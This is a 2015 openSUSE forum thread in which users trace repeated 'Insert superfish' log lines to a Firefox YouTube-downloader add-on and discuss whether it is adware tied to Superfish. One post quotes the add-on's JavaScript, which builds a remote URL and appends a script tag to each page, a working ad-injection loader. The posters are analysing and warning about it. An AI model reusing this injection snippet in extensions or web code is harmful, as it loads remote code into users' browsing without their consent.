Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Mozilla Adware Superfish

  1. #1
    Join Date
    Jun 2008
    Location
    Rural Australia
    Posts
    289

    Default Mozilla Adware Superfish

    One of my users causing logs to fill constantly with repeating lines seeking why, found superfish mentioned here :

    https://forums.opensuse.org/showthread.php/505448-Lenovo-PCs-ship-with-extremely-dangerous-man-in-the-middle-adware-(-Windows-)?p=2696912#post2696912

    with links to further info :

    http://www.pcworld.com/article/28873...ish-snafu.html

    with comment:
    A proposed class-action suit was filed late last week against Lenovo and Superfish, which charges both companies with “fraudulent” business practices and of making Lenovo PCs vulnerable to malware and malicious attacks by pre-loading the adware.

    Plaintiff Jessica Bennett said her laptop was damaged as a result of Superfish, which was called “spyware” in court documents. She also accused Lenovo and Superfish of invading her privacy and making money by studying her Internet browsing habits.

    https://blog.hboeck.de/archives/865-...Superfish.html

    with comment:
    There is a software called Privdog. It totally breaks HTTPS security in a similar way as Superfish.
    providing reference to article: https://m.facebook.com/notes/protect...70074729899339

    where written:
    Superfish uses a third party library from a company named Komodia to modify the Windows networking stack and install a new root Certificate Authority (CA), allowing Superfish to impersonate any SSL-enabled site. The new root CA undermines the security of web browsers and operating systems, putting people at greater risk. The stated reason for this inspection functionality is to enable the Superfish Visual Search capability that looks at people's search queries and makes suggestions based on proprietary processes.

    more worrying:
    the Superfish software can see all of the computer user's activity, including banking, email and Facebook traffic. The second problem is the use and installation of a new root CA,


    Code:
    Aug 04 08:09:24 linux-52pn firefox.desktop[13318]: Insert superfish into: about:preferences
    Aug 04 08:09:25 linux-52pn firefox.desktop[13318]: Insert superfish into: about:blank
    Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:addons
    Aug 04 08:09:47 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
    Aug 04 08:09:50 linux-52pn firefox.desktop[13318]: Insert superfish into: https://services.addons.mozilla.org/en-US/firefox/discovery/pane/38.0.1/Linux/normal#{%22{972ce4c6-7e08-4474-a285-3208198ce6fd}%22:{%22name%22:%22Default%22,%22version%22:%2238.0.1%22,%22type%22:%22theme%22,%22userDisabled%22:true,%22isCompatible%22:true,%22isBlocklisted%22:false},%22susefox@opensuse.org%22:{%22name%22:%22openSUSE%20Firefox%20Extensions%22,%22version%22:%221.0.2%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-OoNOA6XBjznvLQ@jetpack%22:{%22name%22:%22GNotifier%22,%22version%22:%221.8.5%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22jid1-KWFaW5zc0EbtBQ@jetpack%22:{%22name%22:%22YouTube%20Video%20Downloader%20-%20For%20Context%20Menu%22,%22version%22:%220.1.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22info@youtube-mp3.org%22:{%22name%22:%22YouTube%20mp3%22,%22version%22:%221.0.9.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22paulsaintuzb@gmail.com%22:{%22name%22:%22Youtube%20Downloader%20-%204K%20Download%22,%22version%22:%225.7.4.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22captiondownloader@hiephm.com%22:{%22name%22:%22YouTube%20Caption%20Downloader%22,%22version%22:%222.3.1-signed%22,%22type%22:%22extension%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22626160@personas.mozilla.org%22:{%22name%22:%22Cola%22,%22version%22:%220%22,%22type%22:%22theme%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22gmp-gmpopenh264%22:{%22name%22:%22OpenH264%20Video%20Codec%20provided%20by%20Cisco%20Systems,%20Inc.%22,%22version%22:%221.4%22,%22type%22:%22plugin%22,%22userDisabled%22:false,%22isCompatible%22:true,%22isBlocklisted%22:false},%22{0ac05972-878a-da26-5064-b268835efaa5}%22:{%22n
    Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
    The app seems insert into pages opened by browser:

    Code:
    Aug 04 08:09:56 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
    Aug 04 08:11:46 linux-52pn firefox.desktop[13318]: Insert superfish into: https://www.mozilla.org/en-US/plugincheck/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=plugincheck-update
    Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/?q=current%20version%20plugin%20Native%20Client
    Aug 04 08:12:12 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com/post2.html
    Aug 04 08:12:31 linux-52pn firefox.desktop[13318]: Insert superfish into: https://en.wikipedia.org/wiki/Google_Native_Client
    Aug 04 08:13:35 linux-52pn firefox.desktop[13318]: Insert superfish into: about:newtab
    Aug 04 08:13:41 linux-52pn firefox.desktop[13318]: Insert superfish into: https://duckduckgo.com

    For now appears superfish removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
    The App: https://addons.mozilla.org/en-US/fir...ia-downloader/
    Version 5.7.4.1-signed Info
    April 23, 2015
    Released under Mozilla Public License, version 2.0



    How to prevent it being re-installed ?

  2. #2
    Join Date
    Jun 2008
    Location
    Netherlands
    Posts
    25,158

    Default Re: Mozilla Adware Superfish

    And on which version of openSUSE are you seeing this?
    Henk van Velden

  3. #3
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 06:56, paulparker wrote:
    >
    > One of my users causing logs to fill constantly with repeating lines
    > seeking why, found *superfish* mentioned here :


    And what openSUSE version is that user with problems using? And what
    Firefox? I tried searching for a superfix plugin or addon, and I didn't
    find any.

    --
    Cheers / Saludos,

    Carlos E. R.

    (from 13.1 x86_64 "Bottle" (Minas Tirith))

  4. #4
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    this is a strange thread, afaik there is no superfish for linux, it seams the addon you got scans web pages to detect embedded video's, that's what you wanted isn't it, as google goes out of it's way to prevent grabbing youtube content, mozilla usually scans addons for malware but anything is possible, I can tell you what I use to grab video's.
    For youtube only
    https://addons.mozilla.org/en-us/fir...nload-youtube/
    for most other sites including youtube I use flashgot (it has a media detector)
    https://addons.mozilla.org/en-us/fir...ddon/flashgot/
    none of these work with mms, but that's a different issue.

    ps the above addons are both open source and if you try looking for it you can find it, I do believe they're clean.

  5. #5
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    For now appears superfish removed with the app: Youtube Downloader 4K - Video Downloader 5.7.4.1-signed
    The App: https://addons.mozilla.org/en-US/fir...ia-downloader/
    Version 5.7.4.1-signed Info
    April 23, 2015
    Released under Mozilla Public License, version 2.0
    I checked that plugin (https://addons.mozilla.org/en-US/fir...ia-downloader/ ) and it's clean, the reason it's so big (10.2MiB) is it carries binary copies of ffmpeg for 2 platforms (Win and OS-X).
    I'm re-reading your post and can't make heads or tales of it.
    superfish is a windows binary it can do nothing under Linux, did you maybe use mozilla sync and import something from Windows, even with sync Firefox only syncs addons from it's site and a win dll on it's own running under a regular user account can do very little under Linux, worst case scenario delete your ~.mozilla folder and create a new clean profile.

  6. #6
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    browsing the content of
    https://addons.mozilla.org/firefox/d...252-latest.xpi
    I see a file called
    superfish.js
    from the content of that file I'm thinking it could be an ad injector although it could be malware it has nothing to do with Lenovo's man in the middle attack, the js code is there (in the link and in the xpi) you can check it out, I'm surprised mozilla hasn't removed this add-on, maybe injecting ads isn't thought of as a bad thing as every toolbar does it?
    In short you weren't a victim of Lenovo's man in the middle blander, you wore a victim of an ad injector, that add-on is bad there are better ones (see the one's I mentioned a few posts above), being MPL this proves that even open source projects can make bad choices (mediainfo includes adware in it's windows binaries) unfortunately it's the way the internet works (on ads), I would say get your self an ad blocker but that's your choice.

  7. #7
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 22:06, I A wrote:

    > I'm re-reading your post and can't make heads or tales of it.
    > superfish is a windows binary it can do nothing under Linux, did you
    > maybe use mozilla sync and import something from Windows, even with sync


    I'm now guessing that he is admin for a network, and one of the users
    there, using a Windows machine, has that thing. And he wants to block it
    externally, perhaps in the firewall. Or something of the sort.

    I don't think that's possible. That malware inserts or replaces a master
    root certificate, on the system. Any false site those people want to,
    will be certified to be the proper web page for your bank, when it is
    instead a mafia site — but the browser will say it is the correct site.
    You can do nothing externally to avoid this situation.

    What I would do, perhaps, is install Windows Server in a machine, create
    a domain, then force all machines to only log in that Windows Domain
    (AD), and then impose my own rules. AD allows very fine controls on
    programs and users. Specifically, you can deny them the right to install
    software.

    I don't know if this is doable via samba 4 and ldap. They are trying.

    If AD is not an option, then I would give users only users accounts, not
    privileged accounts. Anybody that complains and fights, fired. >:-)

    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)

  8. #8
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 22:26, I A wrote:
    >
    > browsing the content of
    > http://tinyurl.com/od4l52s


    Code:
    https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
    What's the name of that addon? :-?


    > In short you weren't a victim of Lenovo's man in the middle blander, you
    > wore a victim of an ad injector, that add-on is bad there are better
    > ones (see the one's I mentioned a few posts above), being MPL this
    > proves that even open source projects can make bad choices (mediainfo
    > includes adware in it's windows binaries) unfortunately it's the way the
    > internet works (on ads), I would say get your self an ad blocker but
    > that's your choice.


    wow :-o

    Maybe that addon could be reported to mozilla people. :-?


    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)

  9. #9
    Join Date
    Sep 2008
    Posts
    2,997

    Default Re: Mozilla Adware Superfish

    Quote Originally Posted by robin_listas View Post
    On 2015-08-04 22:26, I A wrote:
    >
    > browsing the content of
    > http://tinyurl.com/od4l52s


    Code:
    https://addons.mozilla.org/firefox/downloads/latest/456252/addon-456252-latest.xpi
    What's the name of that addon? :-?


    > In short you weren't a victim of Lenovo's man in the middle blander, you
    > wore a victim of an ad injector, that add-on is bad there are better
    > ones (see the one's I mentioned a few posts above), being MPL this
    > proves that even open source projects can make bad choices (mediainfo
    > includes adware in it's windows binaries) unfortunately it's the way the
    > internet works (on ads), I would say get your self an ad blocker but
    > that's your choice.


    wow :-o

    Maybe that addon could be reported to mozilla people. :-?


    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)
    the name of the addon is
    Youtube Downloader 4K - Video Downloader
    the problem with it is this part
    Code:
    1. //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    2. var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=ylrckcg&CTID=ffpauldn";
    3. if( document.location.href.indexOf("https:") === 0 ){
    4. injectUrl = "https://" + injectUrl;
    5. }
    6. else{
    7. injectUrl = "http://" + injectUrl;
    8. }
    9. var script = document.createElement("script");
    10. script.setAttribute( "src", injectUrl );
    11. document.head.appendChild( script );
    12. }
    13. }
    re-reading the content of the js it does seam to be connected with www.superfish.com and those are the same people that did the MiM deal with lenoveo, but as far as I can tell this addon, injects ads on certain sites it does not do a classic MiM attack

    edit.
    I was just at mozilla's site (as a logged in user) and there doesn't seam to be a way to report "bad addons", the only thing you could do is write a bad review. That's disappointing seeing how mozilla plans on blocking all adons that do not come from addons.mozilla.org and don't have a signature
    https://threatpost.com/mozilla-to-en...tensions-soon/
    this proves that even signed and checked addons are not safe.

  10. #10
    Join Date
    Feb 2009
    Location
    Spain
    Posts
    25,547

    Default Re: Mozilla Adware Superfish

    On 2015-08-04 23:06, I A wrote:

    > the name of the addon is
    > Youtube Downloader 4K - Video Downloader


    Huh. I have:

    "Flash Video Downloader - YouTube HD Downloader [4K] 7.3.1.1-signed", by
    pos1t1ve. Homepage is http://www.flashvideodownloader.org/

    Is it the same? :-?

    > the problem with it is this part

    ....

    > re-reading the content of the js it does seam to be connected with
    > www.superfish.com and those are the same people that did the MiM deal
    > with lenoveo, but as far as I can tell this addon, injects ads on
    > certain sites it does not do a classic MiM attack


    Huh.

    --
    Cheers / Saludos,

    Carlos E. R.
    (from 13.1 x86_64 "Bottle" at Telcontar)

Page 1 of 2 12 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •